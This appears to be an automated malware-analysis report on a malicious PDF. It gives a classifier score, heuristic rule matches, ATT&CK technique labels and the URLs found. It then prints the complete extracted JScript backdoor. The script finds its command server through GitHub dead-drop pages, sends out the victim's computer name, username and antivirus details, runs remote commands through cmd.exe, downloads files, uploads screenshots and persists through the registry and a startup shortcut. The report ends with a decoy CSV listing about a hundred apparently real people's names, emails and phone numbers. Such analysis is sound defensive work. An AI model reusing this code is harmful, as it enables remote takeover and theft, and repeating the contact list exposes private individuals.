Malware Insights
The PDF contains embedded JavaScript that is heavily obfuscated and uses techniques like String.fromCharCode and XOR evaluation. The script attempts to download and execute a second-stage payload from provided URLs, indicating an Ingress Tool Transfer (T1105) attack pattern. It also utilizes ActiveXObject and WScript.Shell, common for Windows scripting execution (T1059.007). The presence of obfuscation (T1027) and the nature of the payload suggest a malicious intent, likely for credential exfiltration or further system compromise. Given it's a PDF, Spearphishing Attachment (T1566.001) is the likely initial access vector.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9997
Heuristics (8)
- JavaScript action (severity: low; 4 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (severity: critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script: `//p0b2x6 return String.fromCharCode.apply(String, bytes); //p0b2x6 } //p0b2x6`
- PDF JavaScript WScript downloader (severity: high; rule PDF_JS_WSCRIPT_DOWNLOADER): Decoded PDF JavaScript reconstructs a Windows Script Host COM downloader using WScript.CreateObject plus XMLHTTP/ADODB.Stream style download, write, and run behavior. This is commodity payload delivery rather than a specific PDF parser CVE trigger.
- Embedded JS stream (severity: low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript contains an unrendered phishing-kit placeholder (severity: low; rule PDF_JS_TEMPLATE_PLACEHOLDER): Embedded JavaScript still contains an unrendered template / mail-merge placeholder (e.g. {SYSLINK}, {{recipient}}, '[[-Email-]]'). A delivered document has these substituted; an unrendered token means the file IS the phishing-kit template whose per-recipient URL / personalisation never ran. Complements PDF_URL_MAILMERGE_PLACEHOLDER, which only inspects annotation URIs.
  Matched line in script: `} else { //p0b2x6 id = get_page_content_with_ie(server + "/getid", "action=getSerial&computer_name="+WshShell.ExpandEnvironmentStrings("%computername%")+"&username="+WshShell.ExpandEnvironmentStrings("%username%")+"&version="+version+"&cli="+ref); //p0b2x6 if(id.length == 16) { //p0b2x6`
- Page-word XOR JavaScript eval stager (severity: high; rule PDF_PAGE_WORD_XOR_EVAL_STAGER): PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
- Suspicious extracted artifact (severity: high; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (severity: info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://raw.githubusercontent.com/deadpooool/news/master/README.md (referenced by PDF JavaScript)
  - https://raw.githubusercontent.com/anvaperhdfjkdhud/1234/master/README.md (referenced by PDF JavaScript)
  - https://raw.githubusercontent.com/deadpooool/news/master/README.md','https://raw.githubusercontent.com/anvaperhdfjkdhud/1234/master/README.md (referenced by PDF JavaScript; the extractor captured the quoted array literal as a single string)
  - https://raw.githubuserc (referenced by PDF JavaScript; truncated as extracted)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0003_000.js | pdf-javascript-stream | PDF /JS object 3 at offset 0x75 | 31108 bytes |

SHA-256: 6e6b3311264114f36c921a151c1cbba6171f6c0532e3de9aefed8b7997fb7ae8

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 11 shell/COM execution token(s). Carved artifact contains 3 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):
try {
//p0b2x6
var WshShell = new ActiveXObject("WScript.Shell"); //p0b2x6
var fso = new ActiveXObject("Scripting.FileSystemObject"); //p0b2x6
var shellApp = new ActiveXObject("shell.application"); //p0b2x6
//p0b2x6
version = "1.3" //p0b2x6
ref = "bd" //p0b2x6
//p0b2x6
items = ['https://raw.githubusercontent.com/deadpooool/news/master/README.md','https://raw.githubusercontent.com/anvaperhdfjkdhud/1234/master/README.md']; //p0b2x6
StorageDir = WshShell.ExpandEnvironmentStrings("%localappdata%")+"\\Microsoft\\PackageCache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"; //p0b2x6
extracted_file = "200_Germany.csv "; //p0b2x6
extracted_file_filesize = 12692 ; //p0b2x6
lnk_filesize = 21890 ; //p0b2x6
startup_shortcut = StorageDir + "\\services.lnk"; //p0b2x6
agent_location = StorageDir + "\\file.js"; //p0b2x6
agent_hidden_executer = StorageDir + "\\startup.js"; //p0b2x6
g3r = StorageDir + "\\g3r.reg"; //p0b2x6
agent_id_location = StorageDir + "\\id"; //p0b2x6
lckFile = StorageDir+"\\h.lck"; //p0b2x6
ieFile = StorageDir + "\\kill.js"; //p0b2x6
av = return_av_name(); //p0b2x6
pFolder = WshShell.ExpandEnvironmentStrings("%localappdata%")+"\\Python"; //p0b2x6
sctFile = pFolder+ "\\SC7.P7D"; //p0b2x6
pyFile = "main.py"; //p0b2x6
pyAlreadyRunning = 0; //p0b2x6
//p0b2x6
if(av.length != av.replace("Kasper", "").length) //p0b2x6
{ //p0b2x6
kasper = 1; //p0b2x6
} //p0b2x6
else //p0b2x6
{ //p0b2x6
kasper = 0; //p0b2x6
} //p0b2x6
kasperWritten = 0; //p0b2x6
main(); //p0b2x6
//p0b2x6
function main() { //p0b2x6
if(WScript.ScriptFullName != agent_location) { //p0b2x6
extract_and_run_decoy(); //p0b2x6
create_storage_dir(); //p0b2x6
create_ie_file(); //p0b2x6
create_startup_executer(); //p0b2x6
copy_agent_to_new_location(); //p0b2x6
exec_cscript(agent_location); //p0b2x6
delete_temp_files(); //p0b2x6
} else { //p0b2x6
lck = fso.CreateTextFile(lckFile, 1); //p0b2x6
exec_cscript(ieFile); //p0b2x6
main_loop(); //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function main_loop() { //p0b2x6
var now = get_time(); //p0b2x6
r3g(); //p0b2x6
if(kasper == 1 && fso.FileExists(agent_id_location) == false && kasperWritten == 0) //p0b2x6
{ //p0b2x6
WshShell.Run("reg import "+g3r, 0, 1); //p0b2x6
create_shortcut_in_startup(); //p0b2x6
kasperWritten = 1; //p0b2x6
} //p0b2x6
else //p0b2x6
{ //p0b2x6
WshShell.Run("reg import "+g3r, 0, 1); //p0b2x6
create_shortcut_in_startup(); //p0b2x6
//p0b2x6
} //p0b2x6
//p0b2x6
server = extract_srvaddr(); //p0b2x6
try { //p0b2x6
id = get_id(); //p0b2x6
while(1) { //p0b2x6
//p0b2x6
var passedsec = get_time()-now; //p0b2x6
if(passedsec > 60*60){ //p0b2x6
now = get_time(); //p0b2x6
server = extract_srvaddr(); //p0b2x6
} //p0b2x6
//p0b2x6
command = get_page_content_with_ie(server + "/getcommand", "action=getCommand&uid="+id); //p0b2x6
eval("obj=" +command); //p0b2x6
if(obj.command.length > 0) { //p0b2x6
if(obj.command.search('download') >= 0) { //p0b2x6
var spl = obj.command.split('|'); //p0b2x6
file = get_page_content_with_ie(server + "/dwnld?u="+spl[1], ""); //p0b2x6
if(file.length > 0) { //p0b2x6
bin_write(spl[2], hex2bin(file)); //p0b2x6
} //p0b2x6
} else { //p0b2x6
WshShell.Run("cmd.exe /c " +obj.command, 0, 0); //p0b2x6
} //p0b2x6
WScript.Sleep(10000); //p0b2x6
} else { //p0b2x6
WScript.Sleep(30000); //p0b2x6
} //p0b2x6
//p0b2x6
if(fso.FileExists(pFolder+"\\"+pyFile) && pyAlreadyRunning == 0) { //p0b2x6
oldWd = WshShell.CurrentDirectory; //p0b2x6
WshShell.CurrentDirectory = pFolder; //p0b2x6
//p0b2x6
pyAlreadyRunning = 1; //p0b2x6
WshShell.Run("python.exe "+pyFile, 0, 0); //p0b2x6
//p0b2x6
WshShell.CurrentDirectory = oldWd; //p0b2x6
} //p0b2x6
//p0b2x6
if(fso.FileExists(sctFile)) { //p0b2x6
sctb64 = base64_encode(sctFile); //p0b2x6
screen = get_page_content_with_ie(server + "/zaqxswcde123456789", "action=sendScreenshot&uid="+id+"&data="+sctb64); //p0b2x6
fso.DeleteFile(sctFile, 1); //p0b2x6
} //p0b2x6
//p0b2x6
} //p0b2x6
} catch (e) { //p0b2x6
WScript.Sleep(60000); //p0b2x6
main_loop(); //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function get_id() { //p0b2x6
id = ""; //p0b2x6
while(id.length != 16) { //p0b2x6
if(fso.FileExists(agent_id_location)) { //p0b2x6
f = fso.OpenTextFile(agent_id_location, 1); //p0b2x6
while (!f.AtEndOfStream) { //p0b2x6
id += f.ReadLine(); //p0b2x6
} //p0b2x6
f.Close(); //p0b2x6
up = get_page_content_with_ie(server + "/getid", "action=up&uid="+id+"&antivirus="+return_av_name()); //p0b2x6
} else { //p0b2x6
id = get_page_content_with_ie(server + "/getid", "action=getSerial&computer_name="+WshShell.ExpandEnvironmentStrings("%computername%")+"&username="+WshShell.ExpandEnvironmentStrings("%username%")+"&version="+version+"&cli="+ref); //p0b2x6
if(id.length == 16) { //p0b2x6
var s = fso.CreateTextFile(agent_id_location, true); //p0b2x6
s.Write(id); //p0b2x6
s.Close(); //p0b2x6
up = get_page_content_with_ie(server + "/getid", "action=up&uid="+id+"&antivirus="+return_av_name()); //p0b2x6
} //p0b2x6
} //p0b2x6
WScript.Sleep(30000); //p0b2x6
} //p0b2x6
return id; //p0b2x6
} //p0b2x6
//p0b2x6
function get_page_content_with_ie(url, postdata) { //p0b2x6
try{ //p0b2x6
var ie = new ActiveXObject("InternetExplorer.Application"); //p0b2x6
ie.Visible = 0; //p0b2x6
if(postdata.length == 0) { //p0b2x6
ie.Navigate(url); //p0b2x6
} else { //p0b2x6
ie.Navigate(url, "", "", stream_string_to_binary(postdata), "Content-Type: application/x-www-form-urlencoded"); //p0b2x6
} //p0b2x6
i = 0; //p0b2x6
while(i < 60) { //p0b2x6
if(ie.ReadyState == 4) { //p0b2x6
i = 60; //p0b2x6
} //p0b2x6
WScript.Sleep(1000); //p0b2x6
i = i + 1; //p0b2x6
} //p0b2x6
content = ie.document.body.innerHTML; //p0b2x6
content = content.replace("&", "&"); //p0b2x6
content = content.replace(">", ">"); //p0b2x6
content = content.replace("<", "<"); //p0b2x6
content = content.replace('"', '"'); //p0b2x6
content = content.replace("<pre>", ""); //p0b2x6
content = content.replace("</pre>", ""); //p0b2x6
content = content.replace("<PRE>", ""); //p0b2x6
content = content.replace("</PRE>", ""); //p0b2x6
ie.Quit(); //p0b2x6
delete ie; //p0b2x6
return content; //p0b2x6
} catch (e) { //p0b2x6
return ''; //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function stream_string_to_binary(str) { //p0b2x6
var BinaryStream = WScript.CreateObject('ADODB.Stream'); //p0b2x6
BinaryStream.Type = 2; //p0b2x6
BinaryStream.CharSet = "us-ascii" //p0b2x6
//p0b2x6
BinaryStream.Open(); //p0b2x6
BinaryStream.WriteText(str); //p0b2x6
BinaryStream.Position = 0; //p0b2x6
BinaryStream.Type = 1; //p0b2x6
//p0b2x6
return BinaryStream.read(); //p0b2x6
} //p0b2x6
//p0b2x6
function num2dot(num) { //p0b2x6
var d = num%256; //p0b2x6
for (var i=3; i>0; i--) { //p0b2x6
num = Math.floor(num/256); //p0b2x6
d = num%256+'.'+d; //p0b2x6
} //p0b2x6
return d; //p0b2x6
} //p0b2x6
//p0b2x6
function get_time() { //p0b2x6
var date = new Date(); //p0b2x6
return date.getTime()/1000|0; //p0b2x6
} //p0b2x6
//p0b2x6
function extract_srvaddr() { //p0b2x6
serverFound = false; //p0b2x6
pattern = 'our news start at (.*) thank you'; //p0b2x6
while(serverFound == false) { //p0b2x6
var item = items[Math.floor(Math.random()*items.length)]; //p0b2x6
var html = get_page_content_with_ie(item,''); //p0b2x6
if(html != '') { //p0b2x6
var match = extract_string(pattern, html); //p0b2x6
if(match != null) { //p0b2x6
srv = num2dot(match[1]/666); //p0b2x6
srv = srv + "/Validate"; //p0b2x6
srv_stat = get_page_content_with_ie(srv+"/ValSrv", ''); //p0b2x6
validate_str = extract_string('youwillnotfindthisanywhare', srv_stat); //p0b2x6
if(validate_str == 'youwillnotfindthisanywhare') { //p0b2x6
serverFound = true; //p0b2x6
return srv; //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function extract_string(pattern, str) { //p0b2x6
if(pattern != '' && str != '') { //p0b2x6
try { //p0b2x6
re = new RegExp(pattern, 'i') //p0b2x6
match = str.match(re); //p0b2x6
return match; //p0b2x6
} catch (e) { //p0b2x6
return null; //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function r3g() { //p0b2x6
var s = fso.CreateTextFile(g3r, true); //p0b2x6
s.WriteLine('Windows Registry Editor Version 5.00'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows]'); //p0b2x6
s.WriteLine('"run"="' +StorageDir.replace(/\\/g, "\\\\")+ '\\\\services.lnk"'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Control Panel\\Cursors]'); //p0b2x6
s.WriteLine('"AppStarting"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,00'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); //p0b2x6
s.WriteLine('"Check_Associations"="no"'); //p0b2x6
s.WriteLine('"NoProtectedModeBanner"=dword:00000001'); //p0b2x6
s.WriteLine('"IE10RunOncePerInstallCompleted"=dword:00000001'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Recovery]'); //p0b2x6
s.WriteLine('"AutoRecover"=dword:00000002'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PhishingFilter]'); //p0b2x6
s.WriteLine('"EnabledV9"=dword:00000001'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\BrowserEmulation]'); //p0b2x6
s.WriteLine('"MSCompatibilityMode"=dword:00000001'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]'); //p0b2x6
s.WriteLine('"EnableBalloonTips"=dword:00000000'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]'); //p0b2x6
s.WriteLine('"GlobalUserOffline"=dword:00000000'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]'); //p0b2x6
s.WriteLine('"2500"=dword:00000003'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner]'); //p0b2x6
s.WriteLine('"BrowserMonitoring"=-'); //p0b2x6
s.WriteLine('"(Mon)3001"=-'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.Close(); //p0b2x6
} //p0b2x6
//p0b2x6
function return_av_name() { //p0b2x6
try { //p0b2x6
var oWMISrvc = GetObject("winmgmts:\\\\.\\root\\cimv2"); //p0b2x6
var colOperatingSystems = oWMISrvc.ExecQuery("SELECT * FROM Win32_OperatingSystem"); //p0b2x6
//p0b2x6
var objItem = new Enumerator(colOperatingSystems); //p0b2x6
for(;!objItem.atEnd();objItem.moveNext()) { //p0b2x6
var version = objItem.item().Version.substr(0,3); //p0b2x6
} //p0b2x6
objWMIService = ""; //p0b2x6
try { //p0b2x6
var objWMIService = GetObject("winmgmts:\\\\.\\root\\SecurityCenter"); //p0b2x6
//p0b2x6
} catch(e) {} //p0b2x6
try { //p0b2x6
var objWMIService = GetObject("winmgmts:\\\\.\\root\\SecurityCenter2"); //p0b2x6
} catch (e) {} //p0b2x6
if (typeof(objWMIService) == "string") //p0b2x6
{ //p0b2x6
return 'N/A'; //p0b2x6
} //p0b2x6
var colItems = objWMIService.ExecQuery("SELECT displayName FROM AntiVirusProduct", "WQL"); //p0b2x6
//p0b2x6
var enumItems = new Enumerator(colItems); //p0b2x6
name = ""; //p0b2x6
for (;!enumItems.atEnd();enumItems.moveNext()) { //p0b2x6
name = enumItems.item().displayName+" and "+name; //p0b2x6
} //p0b2x6
//p0b2x6
if(name != null && name != '') { //p0b2x6
return name; //p0b2x6
} else { //p0b2x6
return 'N/A'; //p0b2x6
} //p0b2x6
} catch (e) { //p0b2x6
return 'N/A'; //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function CreateFolderRecursive(FullPath) { //p0b2x6
var arr = [], dir = [], path = [] //p0b2x6
//p0b2x6
arr = FullPath.split("\\"); //p0b2x6
path = ""; //p0b2x6
for(index=0; index<arr.length; ++index) { //p0b2x6
if(path != "") //p0b2x6
path = path+"\\"; //p0b2x6
path = path+""+arr[index]; //p0b2x6
if(!fso.FolderExists(path)) { //p0b2x6
try { //p0b2x6
fso.CreateFolder(path); //p0b2x6
} catch (e) { //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function copy_agent_to_new_location() { //p0b2x6
fso.CopyFile(WScript.ScriptFullName, agent_location); //p0b2x6
} //p0b2x6
//p0b2x6
function create_startup_executer() { //p0b2x6
var s = fso.CreateTextFile(agent_hidden_executer, true); //p0b2x6
s.WriteLine('var WshShell = new ActiveXObject("WScript.Shell");'); //p0b2x6
s.WriteLine('WshShell.Run("C:\\\\Windows\\\\System32\\\\cscript.exe '+agent_location.replace(/\\/g, "\\\\")+'", 0, 0);'); //p0b2x6
s.Close(); //p0b2x6
} //p0b2x6
//p0b2x6
function create_shortcut_in_startup() { //p0b2x6
var oShellLink = WshShell.CreateShortcut(startup_shortcut); //p0b2x6
oShellLink.TargetPath = "%comspec%"; //p0b2x6
oShellLink.Arguments = "/c cscript "+agent_hidden_executer; //p0b2x6
oShellLink.WindowStyle = 7; //p0b2x6
oShellLink.WorkingDirectory = StorageDir; //p0b2x6
oShellLink.Save(); //p0b2x6
} //p0b2x6
//p0b2x6
//p0b2x6
function create_storage_dir() { //p0b2x6
if(!fso.FolderExists(StorageDir)) { //p0b2x6
CreateFolderRecursive(StorageDir); //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function create_ie_file() { //p0b2x6
if(!fso.FileExists(ieFile)) { //p0b2x6
var s = fso.CreateTextFile(ieFile, true); //p0b2x6
s.WriteLine(unescape("var%20oWMISrvc%20%3D%20GetObject%28%22winmgmts%3A%5C%5C%5C%5C.%5C%5Croot%5C%5Ccimv2%22%29%3Bwhile%281%29%7BWScript.Sleep%28180000%29%3B%20cProcNIE%28%29%3B%7Dfunction%20cProcNIE%28%29%20%7Btry%20%7Bvar%20colProcLst%20%3D%20oWMISrvc.ExecQuery%28%22SELECT%20*%20FROM%20Win32_Process%20WHERE%20CommandLine%20LIKE%20%27%25-Embedding%25%27%20AND%20Name%20%3D%20%27iexplore.exe%27%22%29%3Bvar%20objItem%20%3D%20new%20Enumerator%28colProcLst%29%3Bfor%28%3B%21objItem.atEnd%28%29%3BobjItem.moveNext%28%29%29%20%7Bvar%20p%20%3D%20objItem.item%28%29%3Bp.Terminate%28%29%3B%7D%7D%20catch%20%20%28e%29%20%7B%7D%7D")); //p0b2x6
s.Close(); //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function extract_file(src, dest, start, file_size) { //p0b2x6
var oFile = fso.GetFile(src); //p0b2x6
var oRead = oFile.OpenAsTextStream(); //p0b2x6
data = oRead.Read(oFile.Size); //p0b2x6
oRead.Close(); //p0b2x6
offset_data = data.substr(start+1, file_size); //p0b2x6
var wFile = fso.OpenTextFile(dest, 2, true); //p0b2x6
wFile.Write(offset_data); //p0b2x6
wFile.Close(); //p0b2x6
} //p0b2x6
//p0b2x6
function delete_temp_files() { //p0b2x6
fso.DeleteFile(WScript.arguments(0), 1); //p0b2x6
fso.DeleteFile(WScript.ScriptFullName, 1); //p0b2x6
} //p0b2x6
//p0b2x6
function extract_and_run_decoy() { //p0b2x6
extract_file(WScript.arguments(0), extracted_file, lnk_filesize, extracted_file_filesize); //p0b2x6
WshShell.Run("cmd.exe /c "+extracted_file, false, false); //p0b2x6
} //p0b2x6
//p0b2x6
function exec_cscript(path) { //p0b2x6
WshShell.Run("cscript.exe "+path, false, false); //p0b2x6
} //p0b2x6
//p0b2x6
function base64_encode(path) { //p0b2x6
var inputStream = new ActiveXObject('ADODB.Stream'); //p0b2x6
inputStream.Open(); //p0b2x6
inputStream.Type = 1; //p0b2x6
inputStream.LoadFromFile(path); //p0b2x6
var bytes = inputStream.Read(); //p0b2x6
var dom = new ActiveXObject('Microsoft.XMLDOM'); //p0b2x6
var elem = dom.createElement('tmp'); //p0b2x6
elem.dataType = 'bin.base64'; //p0b2x6
elem.nodeTypedValue = bytes; //p0b2x6
return elem.text.replace(/[^A-Z\d+=\/]/gi, ''); //p0b2x6
} //p0b2x6
//p0b2x6
function bin_write(path, bin_data) { //p0b2x6
var BinaryStream = WScript.CreateObject("ADODB.Stream"); //p0b2x6
BinaryStream.Type = 2; //p0b2x6
BinaryStream.Charset = "ISO-8859-1"; //p0b2x6
BinaryStream.Open(); //p0b2x6
BinaryStream.WriteText(bin_data); //p0b2x6
BinaryStream.SaveToFile(path, 2); //p0b2x6
BinaryStream.Close(); //p0b2x6
} //p0b2x6
//p0b2x6
function hex2bin(hex) { //p0b2x6
var bytes = [], str; //p0b2x6
//p0b2x6
for(var i=0; i< hex.length-1; i+=2) //p0b2x6
bytes.push(parseInt(hex.substr(i, 2), 16)); //p0b2x6
//p0b2x6
return String.fromCharCode.apply(String, bytes); //p0b2x6
} //p0b2x6
//p0b2x6
Marcel,Kressner,Marcelkressner@gmx.de,Germany,(490359) 650-8990
Peter,Klein,klein-peter@freenet.de,Germany,(49) 938-4367
Oleg,Semenov,oleg.semenov@gmx.de,Germany,(1763) 867-4881
Sigmar,Meister,sigmarmeister@gmx.de,Germany,(4901511) 731-7333
Hans,Baumgarten,supertrader@hushmail.com,Germany,(494) 061-7345
Simon,Blessing,simonblessing1@web.de,Germany,(49171) 755-8414
Bernd,Schaefer Sell,berndaushamburg@gmx.de,Germany,(49403) 093-1971
Thilo,Bode,tebe74@googlemail.com,Germany,(49173) 384-4308
Sergej,Stenkin,sergejstenkin@freemail.ru,Germany,(4905641) 748-3361
Valerij,Spickov,walspick@unitybox.de,Germany,(49316) 660-4966
Mike,Grohmann,platafinanz@yahoo.de,Germany,(49305) 163-9935
Rainer,Ludwig,rainerludwig@gmx.net,Germany,(49171) 336-8353
Ulrich,Sperlich,ulrich.sperlich@gmx.de,Germany,(4901535) 380-9513
Steven,Goet,s.goet@web.de,Germany,(4904103) 317-3066
Kumar,Raja,romaraja@hotmail.com,Germany,(160) 733-6190
Hans,Schuldt,HansSchuldt@freenet.de,Germany,(491513) 805-8473
Alexei,Frank,novum_futurum@web.de,Germany,(491573) 816-3543
Meike + Bjoern,Neubauer,meike.bjoern.neubauer@t-online.de,Germany,(49573) 570-9830
Max,Dieringer,max.amir@me.com,Germany,(497115) 764-1334
Tanja,Lau,Lau.Tanja@gmx.de,Germany,(491577) 890-6843
Kevin,Leineweber,KevinLeineweber@gmx.de,Germany,(490049178) 408-6330
Alexander,Kaiser,bigalex77@hotmail.com,Germany,(491766) 103-5114
Christopher,Beyer,C.beyer1@gmx.net,Germany,(490177) 680-5651
Hendrik,Ehlert,hendrik@mehlert-online.de,Germany,(490338) 380-5030
Christian,Bader,badx@gmx.net,Germany,(1533) 757-4469
Stanislaw,Garbacz,stani456@googlemail.com,Germany,(4915771577) 304-7300
Bjoern,Hillers,hilli1970@googlemail.com,Germany,(491764) 134-9816
Curt,Nelsson,curtn@web.de,Germany,(4901578) 849-1843
Sonja & Carsten,Koepke,carstenkoepke3003@yahoo.de,Germany,(4991555985) 361-5800
Valentin,Kolaberdin,valentin@kolaberdin.com,Germany,(491577) 534-0734
Hinrich,Hoernlein Rummel,hhr@prophymed.com,Germany,(490171) 543-7439
Robin,Kosalla,RobinKosalla@googlemail.com,Germany,(49173) 965-3944
Tobias,Feigel,tobias.feigel@web.de,Germany,(49177) 735-1553
Christian-Johannes,Henrich,henrich.business@gmail.com,Germany,(490049163) 394-5150
Juergen,Robert,vk.lauterbach@yahoo.de,Germany,(49163) 343-9665
Augustin,Yimbi,ayimbi@gmx.de,Germany,(493331) 635-4543
Tanja,Mayfurth,tanjamayfurth@hotmail.com,Germany,(49163) 494-3103
Rolf Juergen,Vosseler,rolf.vosseler@t-online.de,Germany,(49485) 383-9404
Harald,Henrich,haraldhenrich0@gmail.com,Germany,(49633) 595-9700
Andreas,Schmitt,andreas_schmitt@live.com,Germany,(49891) 895-9659
Marcel,Schaefer,mas.main@googlemail.com,Germany,(491) 737-4466
Markus,Rechlin,markusrechlin@gmail.com,Germany,(49506703314) 334-8000
Ray (Rainer),Schrader,tipo48@googlemail.com,Germany,(4906753) 131-3609
Nikolaos,Kiparissis,nikos_ctp@hotmail.com,Germany,(1609) 443-3901
Marco,Wirges,marco.wirges@me.com,Germany,(49685) 396-0370
Sabine,Reineke herbst,zockerei@safux.de,Germany,(491768) 113-9113
Karl,Raase,inter-nett@gmx.de,Germany,(49537730334) 844-5000
Bjoern,Ohle,ohleb@yahoo.de,Germany,(49511) 303-3013
Patrick,Gutzmann,ilmyl@me.com,Germany,(491511) 653-9867
AHMET,BATAN,arcob38@windowslive.com,Germany,(490533) 513-1370
Xep,Vu Thi,xep47de@yahoo.de,Germany,(4901530) 777-4759
Hendrik,Schulze,stucan@gmx.de,Germany,(4901577) 170-7184
Gregor,Przeworski,gregor.przeworski@targobank.de,Germany,(491765) 510-6889
Katja,Hebestreit,katjahebestreit@yahoo.de,Germany,(491763) 678-4463
Alex,Huebgen,alexhue.trade@gmail.com,Germany,(496831) 307-1114
Alexander,Alert,alert76@googlemail.com,Germany,(493333) 600-9404
Juergen,Luebke,trader3108@freenet.de,Germany,(495319) 497-7376
Kim,Schwarzkopf,schwarzkopf.k@gmx.net,Germany,(496033) 987-1143
Jeana,Hauswald,jeana_haus@hotmail.de,Germany,(493117) 311-7936
Fabio,Frentzen,Fabio.Frentzen@web.de,Germany,(491578) 656-3768
Alexander,Eichler,airalex@hotmail.de,Germany,(491763) 066-3609
Ewald,Riedel,3683969@online.de,Germany,(490747) 591-4669
Stephan,Schwenke beust,sschwenke@gmx.de,Germany,(494151) 879-4714
Werner,Lenz,1aprovit@live.de,Germany,(491530) 639-9553
Wolfgang,Buschek,wolfib@gmx.de,Germany,(490911) 801-9003
Lukas,Schreiber,kontakt@trade-the-forex.de,Germany,(49173) 767-9418
Marc,Dornieden,Marc.Dornieden@googlemail.com,Germany,(49531) 317-0565
Andreas,Treptow,forex@andreas-treptow.de,Germany,(49630) 179-8670
Birgit,Finke,finke-birgit@t-online.de,Germany,(49175) 376-7351
Manfred,Paulun,manfred@paulunyland.de,Germany,(49453) 638-1671
Lars,Macario,lars.macario@gmail.com,Germany,(49171) 637-6999
Fawad,Amin,fawadamin3011@yahoo.de,Germany,(49309) 148-7670
Piyaphong,Saikamthon,onnoskish@hotmail.com,Germany,(49309) 981-3519
Jessica,Friesen,friesenjessica@gmx.de,Germany,(49178) 143-3506
Max,Lesemann,m.lesemann@posteo.de,Germany,(49173) 300-0000
Heiko,Klabes,heikoklabes@yahoo.de,Germany,(49349) 655-5001
Armin,Staender,arminstaender@gmx.de,Germany,(49173) 613-9606
Michael,Dinse,michaeldinse@gmx.de,Germany,(49173) 349-3743
Alexander,Degenstein,a.degenstein@gmx.de,Germany,(49171) 700-0000
Heiko,Lasch,heikosnews@gmx.de,Germany,(49305) 106-6030
Andreas,Hein,byteorder@me.com,Germany,(49656) 194-1084
Gerhard,Lungershausen,ompoa1@yahoo.de,Germany,(49360) 383-0550
Robert,Kluge,hopper_1@web.de,Germany,(49173) 341-1671
Francoise,Lhote,flhote@gmx.de,Germany,(49691) 751-3975
Karsten,Klimek,denham@gmx.de,Germany,(49691) 534-9778
Nikolas,Drangenstein,drangenstein@googlemail.com,Germany,(4906) 963-6631
Wolfgang,Zipp,wolfgang.zipp@t-online.de,Germany,(4963) 537-3633
Dumitru,Liviu,liviu-dumitru@t-online.de,Germany,(4913) 435-6678
Roy,Almagor,royalg006@mailinator.com,Germany,(4933) 433-4334
Friedrich,Becker,becker-ense@unitybox.de,Germany,(4903) 938-1335
Stefan,Mauss,mauss@t-online.de,Germany,(4951) 131-3407
Florian,Fornoff,daytradecentral@gmail.com,Germany,(4916) 133-1546
Julian,Strobl,julian.strobl@gmx.de,Germany,(491511) 530-9199
Sascha,Berg,sascha-berg@gmx.de,Germany,(49171) 796-3838
Hani,Basta,hany.p@gmx.de,Germany,(4901578) 764-8680
